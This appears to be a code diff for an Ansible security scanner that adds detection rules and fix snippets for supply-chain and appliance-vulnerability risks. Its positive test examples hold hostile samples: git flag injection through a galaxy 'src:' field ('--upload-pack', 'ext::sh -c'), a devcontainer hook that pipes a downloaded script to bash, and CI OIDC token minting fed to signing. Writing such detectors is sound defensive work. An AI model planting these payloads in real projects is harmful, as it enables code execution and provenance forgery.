+          chdir: "{{ repo }}"
+        changed_when: true
+
+  ci_cache_restored_in_privileged_pull_request_target_job:
+    secure_fix: |
+      # Never restore a cache in a pull_request_target job. Run untrusted PR
+      # code under pull_request (read-only token), and do privileged work in a
+      # separate job that checks out the base ref and installs from a pinned
+      # lockfile - not a restored cache.
+      #
+      # .github/workflows/ci.yml (sketch):
+      #   on:
+      #     pull_request:            # untrusted: no cache reuse into a trusted job
+      #   jobs:
+      #     verify:
+      #       permissions:
+      #         contents: read       # no id-token, no write
+      #       steps:
+      #         - uses: actions/checkout@<pinned-sha>   # PR head, read-only
+      #         - run: npm ci --ignore-scripts          # pinned lockfile, integrity-checked
+      #
+      # If a trusted job must cache, scope the key to the base ref only:
+      #         - uses: actions/cache@<pinned-sha>
+      #           with:
+      #             path: ~/.npm
+      #             key: npm-${{ github.base_ref }}-${{ hashFiles('package-lock.json') }}
+      #
+      # From Ansible, fail closed if a workflow pairs the privileged trigger
+      # with a restored cache:
+      - name: Reject pull_request_target workflows that restore a cache
+        ansible.builtin.command:
+          argv:
+            - grep
+            - -RlEz
+            - 'pull_request_target[\s\S]*actions/cache'
+            - .github/workflows
+        register: poisoned_cache_workflows
+        failed_when: poisoned_cache_workflows.rc == 0
+        changed_when: false

--- a/src/ansible_security_scanner/patterns/remediations/system_compromise.yml
+++ b/src/ansible_security_scanner/patterns/remediations/system_compromise.yml
@@ -459,6 +459,64 @@ remediations:
           name: "runc>=1.1.12"
           state: latest
 
+  citrix_netscaler_vulnerable_firmware_pinned:
+    secure_fix: |
+      # Move the pinned build to a CitrixBleed-2 (CVE-2026-3055) fixed
+      # release, then evict any sessions an attacker may already hold.
+      - name: Pin NetScaler firmware to a fixed build
+        ansible.builtin.set_fact:
+          netscaler_firmware: "build 14.1-56.70"   # or 13.1-59.22 / 13.1-FIPS 13.1-37.241
+      - name: Terminate all active sessions after upgrade (tokens are not evicted by the patch)
+        ansible.builtin.command:
+          argv: [ssh, "{{ netscaler_host }}", "shell", "kill icaconnection -all; kill pcoipconnection -all"]
+        changed_when: true
+
+  checkpoint_gateway_vulnerable_version_pinned:
+    secure_fix: |
+      # Apply the CVE-2026-50751 hotfix and move to a fixed Jumbo take.
+      - name: Pin gateway to a hotfixed take
+        ansible.builtin.set_fact:
+          checkpoint_gateway_version: "R81.20"      # with the CVE-2026-50751 hotfix applied
+          checkpoint_required_hotfix: "sk_cve_2026_50751"
+      - name: Disable Mobile Access blade if not required
+        ansible.builtin.debug:
+          msg: "Verify the Remote Access / Mobile Access blade is disabled unless explicitly needed."
+
+  fortiweb_vulnerable_version_pinned:
+    secure_fix: |
+      - name: Pin FortiWeb firmware to a CVE-2025-64446 fixed build
+        ansible.builtin.set_fact:
+          fortiweb_version: "7.6.5"                 # or 7.0.11 / 7.2.11 / 7.4.10
+      - name: Restrict administrative access to a trusted network (local-in policy)
+        ansible.builtin.debug:
+          msg: "Ensure HTTP/HTTPS admin access is not reachable from the internet on FortiWeb."
+
+  windows_netlogon_unpatched_pinned_no_enforcement:
+    secure_fix: |
+      - name: Keep Netlogon secure-channel enforcement ENABLED
+        ansible.windows.win_regedit:
+          path: HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters
+          name: RequireSignOrSeal
+          data: 1
+          type: dword
+      - name: Install security updates on domain controllers (do not skip SecurityUpdates)
+        ansible.windows.win_updates:
+          category_names:
+            - SecurityUpdates
+            - CriticalUpdates
+          state: installed
+
+  sap_netweaver_vulnerable_version_pinned:
+    secure_fix: |
+      # Apply the SAP Security Note for CVE-2026-44748 and move to a patched
+      # support-package stack; disable Visual Composer if unused.
+      - name: Pin NetWeaver to a patched support-package level
+        ansible.builtin.set_fact:
+          sap_netweaver_sp_level: "SP-with-CVE-2026-44748-note-applied"
+      - name: Confirm the affected component is patched or disabled
+        ansible.builtin.debug:
+          msg: "Verify SAP Security Note for CVE-2026-44748 is applied and Visual Composer is disabled if unused."
+
   firmware_update_service_disabled_fwupd_uefi_capsule:
     secure_fix: |
       - name: Keep fwupd enabled and refreshing vendor metadata

--- a/src/ansible_security_scanner/patterns/supply_chain.yml
+++ b/src/ansible_security_scanner/patterns/supply_chain.yml
@@ -806,6 +806,7 @@ patterns:
     multiline: true
     window: 10
     recommendation: "Prefer `pull_request` (runs in the fork's context with a read-only token). If you genuinely need base-repo secrets, require an `if: github.event.pull_request.head.repo.full_name == github.repository` guard so the job only runs for non-fork branches, and NEVER check out `${{ github.event.pull_request.head.sha }}` before that guard. Read: https://securitylab.github.com/resources/github-actions-preventing-pwn-requests/"
+    cve: ["CVE-2026-45321"]
     cis_controls: ["CIS-Supply-Chain"]
     nist_controls: ['AC-3', 'AC-6', 'CM-11', 'SA-10', 'SI-7']
     pci_dss: ['6.3.2', '7.2.1', '7.2.2']
@@ -1082,6 +1083,7 @@ patterns:
             ansible.builtin.get_url:
               url: https://example.com/api/config
               dest: /etc/app.json
+    cve: ["CVE-2026-45321"]
     cis_controls: ["CIS-Supply-Chain"]
     nist_controls: ["CM-11", "SA-10", "SA-11", "SI-7"]
     pci_dss: ["6.3.2", "6.3.3"]
@@ -2786,3 +2788,150 @@ patterns:
     pci_dss: ['3.6.1', '8.3.1', '10.3.1']
     hipaa: ['164.312(a)(2)(i)', '164.312(b)']
     soc2: ['CC6.1', 'CC7.2']
+
+  - id: "galaxy_requirements_src_argument_injection"
+    category: "supply_chain"
+    severity: "HIGH"
+    title: "Galaxy Requirement src: Injects git Argument Flags (CVE-2026-11332)"
+    description: "A galaxy requirement (`requirements.yml` role/collection entry, or a role's `meta/requirements.yml`) has a `src:` value that begins with a `-` or embeds a git command-line flag (`--upload-pack`, `--config`/`-c`, `ext::`, `--template`, `--separate-git-dir`). `ansible-galaxy role install` passes `src:` into a `git` invocation without neutralising argument delimiters (CVE-2026-11332, CVSS 7.8, disclosed Jun 2026), so a malicious role author can smuggle git flags through the field and reach arbitrary code execution on the machine that installs the role. `--upload-pack=<cmd>` and `ext::sh -c <cmd>` are the direct RCE primitives; `-c core.fsmonitor=<cmd>` and `-c protocol.ext.allow=always` are the enablers. Any `src:` whose first non-quote character is `-`, or that contains `ext::`, is either an injection attempt or a typo that will break the install."
+    regex: "(?m)^[ \\t]*(?:-\\s+)?src\\s*:\\s*['\"]?(?:-{1,2}[A-Za-z]|ext::|[^'\"\\n]*?\\s--?(?:upload-pack|config|template|separate-git-dir|c)\\b)"
+    positive_examples:
+      - "    src: '--upload-pack=touch /tmp/pwned'"
+      - "    src: ext::sh -c touch% /tmp/pwned"
+      - "  - src: -c protocol.ext.allow=always"
+    negative_examples:
+      - "    src: https://github.com/myorg/ansible-role-nginx"
+      - "    src: git+https://git.example.com/ansible/collection-foo"
+      - "  - src: geerlingguy.nginx"
+    recommendation: "Upgrade ansible-core to >= 2.21.1 (the fix passes role requirement fields as positional git arguments after a `--` delimiter). Never install roles or collections from untrusted sources. In `requirements.yml`, a `src:` must be a plain Galaxy name (`namespace.name`), an `https://` URL, or a `git+https://` / `git@` URL - it must never begin with `-` or contain `ext::`. Pin every git source to an immutable commit SHA via `version:`. Gate `ansible-galaxy install -r` in CI behind a schema check that rejects any `src:` starting with a dash."
+    cve: ["CVE-2026-11332"]
+    cwe: ['CWE-88', 'CWE-77']
+    owasp_appsec: ["A03:2021", "A08:2021"]
+    owasp_asvs: [V15.2.4, V5.2.5]
+    mitre_attack: ['T1195.002', 'T1059']
+    cis_controls: ['CIS-Supply-Chain', 'CIS-16.11']
+    nist_controls: ['CM-11', 'SA-10', 'SI-3', 'SI-10']
+    pci_dss: ['6.2.4', '6.3.2']
+    hipaa: ['164.312(a)(1)']
+    soc2: ['CC7.1', 'CC8.1']
+
+  - id: "ci_oidc_token_minted_then_piped_to_signing"
+    category: "supply_chain"
+    severity: "HIGH"
+    title: "CI OIDC Token Minted And Piped Into An Artifact Signing Step"
+    description: "A task reads a CI OIDC token from the runner (`ACTIONS_ID_TOKEN_REQUEST_URL` / `ACTIONS_ID_TOKEN_REQUEST_TOKEN`, `curl ...&audience=sigstore`, `gh actions-id-token`, `SLSA`/`cosign`-oriented `id-token` request) and feeds it into a signing / attestation step (`cosign sign`, `cosign attest`, `slsa-github-generator`, `syft attest`, `sigstore-python`). Minting the ambient workload-identity token and handing it to a signing tool in the same playbook is the provenance-forgery primitive documented in the 2026 Miasma / Shai-Hulud supply-chain worms: an attacker who lands code in the pipeline uses the runner's own OIDC identity to produce a valid SLSA attestation over a malicious artifact, so downstream verification passes. Legitimate signing should happen in a dedicated, minimal, reviewed job - not inline next to arbitrary build steps that could be tampered with."
+    regex: "(?:ACTIONS_ID_TOKEN_REQUEST_(?:URL|TOKEN)|actions-id-token|audience=sigstore|id-token\\s*:\\s*write)[\\s\\S]{0,600}?(?:cosign\\s+(?:sign|attest)|slsa-github-generator|syft\\s+attest|sigstore)"
+    positive_examples:
+      - |2-
+        shell: |
+            TOKEN=$(curl -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL&audience=sigstore" | jq -r .value)
+            cosign sign --identity-token "$TOKEN" $IMAGE
+    negative_examples:
+      - |2-
+        - name: build the image
+          community.docker.docker_image:
+            name: myapp
+            source: build
+      - |2-
+        - name: verify a signature at deploy time
+          ansible.builtin.command: cosign verify --certificate-identity ci@example.com myapp:1.2.3
+    multiline: true
+    window: 16
+    recommendation: "Do signing in an isolated, least-privilege CI job whose only inputs are the immutable build artifact (by digest) and the OIDC identity - never inline with build/test steps that execute third-party code. Scope `id-token: write` to that job alone (GitHub Actions job-level `permissions:`), and pin every action in it to a full commit SHA. Verify the artifact digest against the build job's output before signing. Prefer the maintained `slsa-framework/slsa-github-generator` reusable workflow over a hand-rolled `curl | cosign` so the token never transits a shell you control. At consumption time, verify both the signature and the SLSA provenance predicate (builder ID + source repo), not just that a signature exists."
+    cve: ["CVE-2026-45321"]
+    cwe: ['CWE-345', 'CWE-347', 'CWE-16']
+    owasp_appsec: ["A08:2021"]
+    owasp_asvs: [V15.2.4, V10.3.2]
+    mitre_attack: ['T1195.002', 'T1606']
+    cis_controls: ['CIS-Supply-Chain', 'CIS-16.1']
+    nist_controls: ['CM-14', 'SA-10', 'SI-7', 'SR-11']
+    pci_dss: ['6.3.2']
+    soc2: ['CC7.1', 'CC8.1']
+
+  - id: "config_file_with_embedded_run_on_event_command"
+    category: "supply_chain"
+    severity: "HIGH"
+    title: "Playbook Writes A Config File That Executes A Command On Open / Install / Build"
+    description: "A task writes a developer-config file whose format runs a shell command as a side effect of a routine action: `.devcontainer/devcontainer.json` / `devcontainer.json` with `postCreateCommand` / `postStartCommand` / `onCreateCommand` / `initializeCommand`, a `package.json` with `preinstall` / `postinstall` / `prepare` scripts, a `binding.gyp` (runs during `npm install` via node-gyp), or a git `core.hooksPath` / `.git/hooks/` entry. These 'config files that run code' turn `code .`, `npm install`, or `git commit` into arbitrary execution on a developer or CI machine. Planting them from a playbook - especially with a templated command body - is a persistence and lateral-movement primitive: the command runs later, as the developer, with no further prompt."
+    regex: "(?:ansible\\.builtin\\.(?:copy|template|blockinfile|lineinfile)|copy|template|blockinfile|lineinfile)\\s*:[\\s\\S]{0,300}?(?:(?:dest|path)\\s*:\\s*['\"]?[^'\"\\n]*(?:devcontainer\\.json|binding\\.gyp|/\\.git/hooks/|core\\.hooksPath)|(?:content|line|block)\\s*:[\\s\\S]{0,200}?(?:postCreateCommand|postStartCommand|onCreateCommand|initializeCommand|\"(?:preinstall|postinstall|prepare)\"\\s*:))"
+    positive_examples:
+      - |2-
+        - name: drop a devcontainer
+          ansible.builtin.copy:
+            dest: "{{ repo }}/.devcontainer/devcontainer.json"
+            content: '{ "postCreateCommand": "curl http://x/i.sh | bash" }'
+      - |2-
+        - name: template package.json with an install hook
+          ansible.builtin.copy:
+            dest: /srv/app/package.json
+            content: '{ "scripts": { "postinstall": "node ./setup.js" } }'
+    negative_examples:
+      - |2-
+        - name: write a plain app config
+          ansible.builtin.copy:
+            dest: /etc/myapp/config.json
+            content: '{ "log_level": "info" }'
+      - |2-
+        - name: template an nginx conf
+          ansible.builtin.template:
+            src: nginx.conf.j2
+            dest: /etc/nginx/nginx.conf
+    multiline: true
+    window: 14
+    recommendation: "Keep developer-config files that can execute code (`devcontainer.json`, `package.json` lifecycle scripts, `binding.gyp`, git hooks) in the repository under code review, not pushed by automation. If automation must stage one, pin and checksum the exact content and never build the command from a template variable. For git, set `git config --global core.hooksPath` only to a reviewed, read-only, root-owned directory. In CI, run `npm ci --ignore-scripts` (or `--foreground-scripts` with a reviewed allowlist) so `preinstall`/`postinstall` cannot execute untrusted code. Audit any planted file for command-executing keys before trusting it."
+    cwe: ['CWE-94', 'CWE-506', 'CWE-829']
+    owasp_appsec: ["A03:2021", "A08:2021"]
+    owasp_asvs: [V15.2.4, V5.2.5]
+    mitre_attack: ['T1195.002', 'T1546', 'T1059']
+    cis_controls: ['CIS-Supply-Chain', 'CIS-16.11']
+    nist_controls: ['CM-7', 'SA-10', 'SI-3', 'SI-7']
+    pci_dss: ['6.2.4', '6.3.2']
+    soc2: ['CC7.1', 'CC8.1']
+
+  - id: "ci_cache_restored_in_privileged_pull_request_target_job"
+    category: "supply_chain"
+    severity: "HIGH"
+    title: "GitHub Actions Restores A Cache In A pull_request_target Workflow (Cache Poisoning, CVE-2026-45321)"
+    description: "A workflow that triggers on `pull_request_target` also uses `actions/cache` (or `actions/cache/restore`, or a `cache:` option on `setup-node`/`setup-python`/`setup-go`). `pull_request_target` runs with the base repository's write token, and the Actions cache is writable from an ordinary `pull_request` run on a fork branch - so an attacker restores a cache entry they poisoned from a fork into a trusted, privileged build. This is the cache-poisoning leg of the 2026 Mini Shai-Hulud chain (CVE-2026-45321): a poisoned dependency enters the trusted build, then the job's OIDC identity signs the result with valid provenance. A privileged trigger and a restored cache should never appear in the same workflow."
+    regex: "(?:on\\s*:\\s*(?:\\[[^\\]]*pull_request_target[^\\]]*\\]|[\\s\\S]{0,300}?\\n\\s*pull_request_target\\s*:))[\\s\\S]{0,4000}?(?:uses\\s*:\\s*actions/cache(?:/restore)?@|\\n\\s*cache\\s*:\\s*(?:['\"]?(?:npm|yarn|pnpm|pip|poetry|go|gradle|maven|sbt)|true))"
+    positive_examples:
+      - |2-
+        on:  # yamllint disable-line rule:truthy
+          pull_request_target:
+        jobs:
+          build:
+            steps:
+              - uses: actions/cache@v4
+                with:
+                  path: node_modules
+                  key: deps-${{ hashFiles('package-lock.json') }}
+    negative_examples:
+      - |2-
+        on:  # yamllint disable-line rule:truthy
+          pull_request:
+        jobs:
+          build:
+            steps:
+              - uses: actions/cache@v4
+                with:
+                  path: node_modules
+                  key: deps-${{ hashFiles('package-lock.json') }}
+      - |2-
+        on:  # yamllint disable-line rule:truthy
+          pull_request_target:
+        jobs:
+          label:
+            steps:
+              - uses: actions/labeler@v5
+    multiline: true
+    window: 60
+    recommendation: "Never restore a cache in a `pull_request_target` workflow. Split the work: run untrusted PR code (and any cache it touches) under `pull_request` with a read-only token, and do privileged steps in a separate `pull_request_target` job that checks out only the base ref and installs dependencies from a pinned lockfile with integrity checking (`npm ci`, `pip install --require-hashes`) rather than a restored cache. If you must cache in a trusted job, scope the cache key to the base ref only (never `hashFiles` of fork-controlled paths) and treat any restored artifact as untrusted input. Pin every action to a full commit SHA."
+    cve: ["CVE-2026-45321"]
+    cwe: ['CWE-349', 'CWE-829', 'CWE-345']
+    owasp_appsec: ["A08:2021", "A01:2021"]
+    owasp_asvs: [V15.2.4]
+    mitre_attack: ['T1195.002', 'T1199']
+    cis_controls: ['CIS-Supply-Chain', 'CIS-16.1']
+    nist_controls: ['CM-11', 'SA-10', 'SI-7', 'SR-11']
+    pci_dss: ['6.3.2', '7.2.1']
+    soc2: ['CC7.1', 'CC8.1']

--- a/src/ansible_security_scanner/patterns/system_compromise.yml
+++ b/src/ansible_security_scanner/patterns/system_compromise.yml
@@ -1158,3 +1158,103 @@ patterns:
     pci_dss: ['2.2.1', '5.2.1', '6.3.3']
     hipaa: ['164.308(a)(5)(ii)(B)', '164.312(c)(1)']
     soc2: ['CC6.1', 'CC7.1']
+
+  - id: "citrix_netscaler_vulnerable_firmware_pinned"
+    category: "system_compromise"
+    severity: "CRITICAL"
+    title: "Citrix NetScaler ADC / Gateway Pinned To CitrixBleed-2 Vulnerable Build (CVE-2026-3055)"
+    description: "A task sets or templates a Citrix NetScaler ADC / Gateway (`ns-*.nc`, `citrix_adm`, `citrixadc`, a `get_url`/`copy` of a `build-13.1-*` / `build-14.1-*` firmware image, or a `sslvpn`/`ns.conf` version field) at a firmware build known vulnerable to CVE-2026-3055 (the 2026 'CitrixBleed 2' memory-disclosure / session-hijack, mass-exploited on internet-facing gateways). Vulnerable: 14.1 before 14.1-56.70, 13.1 before 13.1-59.22, 13.1-FIPS/NDcPP before 13.1-37.241. Pinning a NetScaler image in this range from a playbook leaves an unauthenticated pre-auth token-theft primitive exposed on the perimeter."
+    regex: "(?:netscaler|citrixadc|citrix_adc|ns\\.conf|nsconfig)[\\s\\S]{0,400}?(?:build|version|firmware)\\s*[:=]\\s*['\"]?(?:build\\s+)?(?:13\\.1-(?:[0-5]?[0-9])\\.|14\\.1-(?:[0-4]?[0-9]|5[0-6])\\.)"
+    positive_examples:
+      - "netscaler_firmware: build 14.1-25.56"
+    multiline: true
+    window: 20
+    recommendation: "Upgrade NetScaler ADC / Gateway to a CVE-2026-3055 (CitrixBleed 2) fixed build: 14.1-56.70+, 13.1-59.22+, or 13.1-FIPS/NDcPP 13.1-37.241+. After upgrading, terminate ALL active ICA and PCoIP sessions (`kill icaconnection -all`, `kill pcoipconnection -all`) - a fixed build does not evict tokens an attacker already stole. Rotate any secrets reachable from a hijacked session, review the appliance for web shells and unexpected admin accounts, and restrict management access to a dedicated network. Front the gateway with WAF signatures for the CVE and monitor for anomalous session reuse across source IPs."
+    cve: ["CVE-2026-3055"]
+    cwe: ['CWE-125', 'CWE-200', 'CWE-1220']
+    owasp_appsec: ["A01:2021", "A06:2021"]
+    mitre_attack: ['T1190', 'T1550.004', 'T1539']
+    cis_controls: ['CIS-4.8', 'CIS-7.3', 'CIS-7.7']
+    nist_controls: ['RA-5', 'SI-2', 'SC-8']
+    pci_dss: ['6.3.3', '11.3.1']
+    soc2: ['CC7.1', 'CC7.2']
+
+  - id: "checkpoint_gateway_vulnerable_version_pinned"
+    category: "system_compromise"
+    severity: "HIGH"
+    title: "Check Point Security Gateway Pinned To Path-Traversal Vulnerable Build (CVE-2026-50751)"
+    description: "A task configures a Check Point Security Gateway / Quantum appliance (`checkpoint`, `cp_mgmt_*`, `gaia`, a firmware/hotfix `get_url`/`copy`, or a `version:`/`take:` field) at a build known vulnerable to CVE-2026-50751 (arbitrary file read via path traversal on the Remote Access VPN / Mobile Access blade, actively exploited to disclose credentials from internet-facing gateways). Pinning or leaving a gateway on an affected R80.x / R81.x build without the fixing hotfix exposes an unauthenticated file-read primitive on the perimeter."
+    regex: "(?:checkpoint|cp_mgmt|check_point|gaia)[\\s\\S]{0,400}?(?:version|take|jumbo|hotfix)\\s*[:=]\\s*['\"]?(?:R80\\.[0-9]+|R81(?:\\.[0-9]+)?)\\b"
+    positive_examples:
+      - "checkpoint_gateway_version: R81.10"
+    multiline: true
+    window: 20
+    recommendation: "Apply the Check Point hotfix for CVE-2026-50751 (see sk-article for your R-train) and move to a fixed Jumbo Hotfix Accumulator take. Disable the Remote Access / Mobile Access blade if it is not required. After patching, rotate all credentials that could have been read from the gateway (local admin, RADIUS/LDAP bind, certificate keys) and review VPN logs for anomalous file-read requests and logins. Restrict management to a dedicated network and enable IPS signatures for the CVE."
+    cve: ["CVE-2026-50751"]
+    cwe: ['CWE-22', 'CWE-200']
+    owasp_appsec: ["A01:2021", "A06:2021"]
+    mitre_attack: ['T1190', 'T1006', 'T1552.001']
+    cis_controls: ['CIS-4.8', 'CIS-7.3', 'CIS-7.7']
+    nist_controls: ['RA-5', 'SI-2', 'AC-3']
+    pci_dss: ['6.3.3', '11.3.1']
+    soc2: ['CC7.1', 'CC7.2']
+
+  - id: "fortiweb_vulnerable_version_pinned"
+    category: "system_compromise"
+    severity: "CRITICAL"
+    title: "FortiWeb Pinned To Auth-Bypass Vulnerable Firmware (CVE-2025-64446)"
+    description: "A task manages a Fortinet FortiWeb WAF (`fortinet.fortiweb.*` module, or a firmware image `get_url`/`copy`, or a `version:` field naming FortiWeb) at a build vulnerable to CVE-2025-64446 - the path-traversal + authentication-bypass chain that lets an unauthenticated attacker create an admin account and reach RCE, mass-exploited on internet-facing FortiWeb in late 2025. Vulnerable: 7.0.x before 7.0.11, 7.2.x before 7.2.11, 7.4.x before 7.4.10, 7.6.x before 7.6.5. Leaving FortiWeb on an affected build is a direct perimeter takeover primitive."
+    regex: "(?:fortiweb|fortinet\\.fortiweb)[\\s\\S]{0,400}?(?:version|build|firmware)\\s*[:=]\\s*['\"]?(?:7\\.0\\.(?:[0-9]|10)\\b|7\\.2\\.(?:[0-9]|10)\\b|7\\.4\\.[0-9]\\b|7\\.6\\.[0-4]\\b)"
+    positive_examples:
+      - "fortiweb_version: 7.6.2"
+    multiline: true
+    window: 20
+    recommendation: "Upgrade FortiWeb to a CVE-2025-64446 fixed build: 7.0.11+, 7.2.11+, 7.4.10+, or 7.6.5+. Until patched, disable HTTP/HTTPS administrative access on internet-facing interfaces (restrict management to a trusted network or local-in policy). After patching, audit for attacker-created admin accounts, unexpected config changes, and web shells; rotate all admin credentials and API keys. Enable FortiGuard IPS signatures for the CVE and monitor auth logs for account-creation events from external IPs."
+    cve: ["CVE-2025-64446"]
+    cwe: ['CWE-22', 'CWE-288', 'CWE-306']
+    owasp_appsec: ["A01:2021", "A07:2021"]
+    mitre_attack: ['T1190', 'T1136', 'T1068']
+    cis_controls: ['CIS-4.8', 'CIS-7.3', 'CIS-7.7']
+    nist_controls: ['RA-5', 'SI-2', 'AC-6']
+    pci_dss: ['6.3.3', '11.3.1']
+    soc2: ['CC7.1', 'CC7.2']
+
+  - id: "windows_netlogon_unpatched_pinned_no_enforcement"
+    category: "system_compromise"
+    severity: "CRITICAL"
+    title: "Windows Netlogon Privilege-Escalation Patch Skipped / Enforcement Disabled (CVE-2026-41089)"
+    description: "A task pins a Windows update to a pre-fix KB, sets `win_updates` to skip the SecurityUpdates category on a domain controller, or writes a registry value that disables Netlogon secure-channel enforcement (`FullSecureChannelProtection=0`, `RequireSignOrSeal=0`, `vulnerablechannelallowlist`). CVE-2026-41089 is a 2026 Netlogon elevation-of-privilege on domain controllers; skipping its patch or re-enabling the vulnerable channel behaviour from a playbook leaves a domain-takeover primitive open."
+    regex: "(?:FullSecureChannelProtection|RequireSignOrSeal|vulnerablechannelallowlist)\\s*[:=][\\s\\S]{0,40}?(?:0|false|no)\\b|win_updates[\\s\\S]{0,300}?(?:reject_list|skip)[\\s\\S]{0,200}?(?:SecurityUpdates|CriticalUpdates)"
+    positive_examples:
+      - "RequireSignOrSeal: 0"
+    multiline: true
+    window: 20
+    recommendation: "Install the CVE-2026-41089 (Netlogon EoP) security update on every domain controller and member server; do not exclude SecurityUpdates/CriticalUpdates from `win_updates` on DCs. Leave Netlogon secure-channel enforcement enabled - never set `FullSecureChannelProtection=0`, `RequireSignOrSeal=0`, or populate `vulnerablechannelallowlist`. After patching, monitor Netlogon event IDs (5827-5831) for denied vulnerable connections and remediate any legacy device still using an insecure channel rather than weakening the DC."
+    cve: ["CVE-2026-41089"]
+    cwe: ['CWE-287', 'CWE-269', 'CWE-1188']
+    owasp_appsec: ["A05:2021", "A07:2021"]
+    mitre_attack: ['T1068', 'T1210', 'T1550']
+    cis_controls: ['CIS-4.8', 'CIS-7.3', 'CIS-7.7']
+    nist_controls: ['RA-5', 'SI-2', 'AC-6']
+    pci_dss: ['6.3.3', '11.3.1']
+    soc2: ['CC7.1', 'CC7.2']
+
+  - id: "sap_netweaver_vulnerable_version_pinned"
+    category: "system_compromise"
+    severity: "CRITICAL"
+    title: "SAP NetWeaver Pinned Without Fix For Actively-Exploited RCE (CVE-2026-44748)"
+    description: "A task provisions SAP NetWeaver / Visual Composer (`community.sap_*`, an SPS/patch `get_url`/`copy`, or a `sp_level:`/`version:` field) at a support-package level known vulnerable to CVE-2026-44748 (2026 unauthenticated deserialization / metadata-upload RCE in NetWeaver, actively exploited to drop web shells on internet-facing SAP). Provisioning NetWeaver at an unpatched SPS without the SAP Security Note applied leaves an unauthenticated RCE primitive on a business-critical system."
+    regex: "(?:netweaver|sap_netweaver|visual\\s*composer|sapnwrfc|community\\.sap)[\\s\\S]{0,400}?(?:sp_level|sps|patch_level|version)\\s*[:=]\\s*['\"]?(?:SP0?[0-9]{1,2}\\b|7\\.[0-9]{2}\\b)"
+    positive_examples:
+      - "sap_netweaver_sp_level: SP08"
+    multiline: true
+    window: 20
+    recommendation: "Apply the SAP Security Note for CVE-2026-44748 and move to a patched support-package stack; if Visual Composer / the affected component is unused, remove or disable it. Restrict internet exposure of SAP application servers - front them with a reverse proxy / WAF and place the ICM behind network controls. After patching, hunt for web shells under the servlet/upload directories, review the SAP audit log (`SM20`) and ICM traces for anomalous metadata uploads, and rotate credentials reachable from the compromised host."
+    cve: ["CVE-2026-44748"]
+    cwe: ['CWE-502', 'CWE-434', 'CWE-306']
+    owasp_appsec: ["A08:2021", "A06:2021"]
+    mitre_attack: ['T1190', 'T1505.003', 'T1059']
+    cis_controls: ['CIS-4.8', 'CIS-7.3', 'CIS-7.7']
+    nist_controls: ['RA-5', 'SI-2', 'SI-10']
+    pci_dss: ['6.3.3', '11.3.1']
+    soc2: ['CC7.1', 'CC7.2']

--- a/src/ansible_security_scanner/patterns/template_injection.yml
+++ b/src/ansible_security_scanner/patterns/template_injection.yml
@@ -279,6 +279,7 @@ patterns:
     soc2: ['CC7.1']
     mitre_attack: ["T1059.007", "T1105"]
     cwe: ["CWE-78", "CWE-1336"]
+    cve: ["CVE-2020-1734"]
     owasp_appsec: ["A03:2021"]
 
   - id: "jinja2_set_from_env"

--- a/src/ansible_security_scanner/remediations/_pattern_index.py
+++ b/src/ansible_security_scanner/remediations/_pattern_index.py
@@ -32,7 +32,6 @@ def _index() -> dict[str, dict]:
                 "negative_examples": p.get("negative_examples") or [],
                 "category": p.get("category") or "",
                 "title": p.get("title") or "",
-                "no_ansible_remediation": bool(p.get("no_ansible_remediation", False)),
             }
     return out
 

--- a/src/ansible_security_scanner/remediations/base.py
+++ b/src/ansible_security_scanner/remediations/base.py
@@ -84,21 +84,11 @@ def _render_from_metadata(
     title = meta.get("title") or title_fallback
     description = meta.get("description") or description_fallback or f"this {rule_id} issue"
     recommendation = meta.get("recommendation") or recommendation_fallback
-    no_ansible_fix = bool(meta.get("no_ansible_remediation"))
 
-    secure_fix = None if no_ansible_fix else _select_secure_fix(rule_id)
-    if secure_fix:
-        secure_block = f"\n**\u2705 Secure Fix Example:**\n```yaml\n{secure_fix}\n```\n"
-    elif no_ansible_fix:
-        secure_block = (
-            "\n**\u2705 Secure Response:**\n"
-            "This rule flags an action whose correct response is procedural - "
-            "escalate, audit, or perform via a reviewed IaC pipeline rather than "
-            "directly from Ansible. See the Recommendation above for the exact "
-            "operational response.\n"
-        )
-    else:
-        secure_block = ""
+    secure_fix = _select_secure_fix(rule_id)
+    secure_block = (
+        f"\n**\u2705 Secure Fix Example:**\n```yaml\n{secure_fix}\n```\n" if secure_fix else ""
+    )
 
     rec_block = f"\n**\U0001f6e0 Recommendation:**\n{recommendation}\n" if recommendation else ""
     heading = title or f"What this rule detects ({rule_id})"

--- a/src/ansible_security_scanner/remediations/rule_id_categories.yml
+++ b/src/ansible_security_scanner/remediations/rule_id_categories.yml
@@ -25,6 +25,7 @@
 rules_by_category:
 
   ai_ml_security:
+    - ai_assistant_config_or_hook_file_planted
     - anthropic_api_key
     - aws_bedrock_access
     - aws_sagemaker_access
@@ -89,6 +90,7 @@ rules_by_category:
     - ansible_ssh_pass
     - ansible_winrm_password
     - awx_ask_credential_on_launch
+    - awx_config_yaml_include_path_traversal
     - awx_controller_host_literal_admin
     - awx_credential_inputs_literal
     - awx_execution_environment_privileged
@@ -103,6 +105,7 @@ rules_by_category:
     - cicd_token_exposure
     - docker_socket_mounted_into_task
     - elasticsearch_unauthenticated
+    - git_checkout_jinja_in_branch_or_refspec
     - kubeconfig_access
     - mongodb_unauthenticated
     - podman_container_privileged
@@ -112,6 +115,7 @@ rules_by_category:
     - snmp_community_string
     - terraform_apply_auto_approve_from_ansible
     - terraform_state_access
+    - unsafe_content_rerendered_via_hostvars
     - vault_password_file
     - windows_registry_persistence
 
@@ -770,10 +774,13 @@ rules_by_category:
     - callback_whitelist_arbitrary
     - cargo_install_from_git_unpinned
     - check_point_quantum_vulnerable_install
+    - ci_cache_restored_in_privileged_pull_request_target_job
+    - ci_oidc_token_minted_then_piped_to_signing
     - cisco_unified_communications_vulnerable_install
     - citrix_netscaler_management_interface_exposed_to_internet
     - cloudflared_tunnel_install_arbitrary
     - compose_db_port_bound_0_0_0_0
+    - config_file_with_embedded_run_on_event_command
     - connectwise_screenconnect_vulnerable_install
     - container_image_over_http_registry
     - container_image_unpinned_tag
@@ -807,6 +814,7 @@ rules_by_category:
     - galaxy_requirements_git_branch_ref
     - galaxy_requirements_http_source
     - galaxy_requirements_non_galaxy_source
+    - galaxy_requirements_src_argument_injection
     - gem_cpan_cargo_insecure_source_added
     - gem_install_local
     - gh_actions_pull_request_target
@@ -881,6 +889,8 @@ rules_by_category:
     - backdoor_listener
     - byovd_known_vulnerable_kernel_driver_install
     - cassandra_allow_all_authenticator_with_superuser
+    - checkpoint_gateway_vulnerable_version_pinned
+    - citrix_netscaler_vulnerable_firmware_pinned
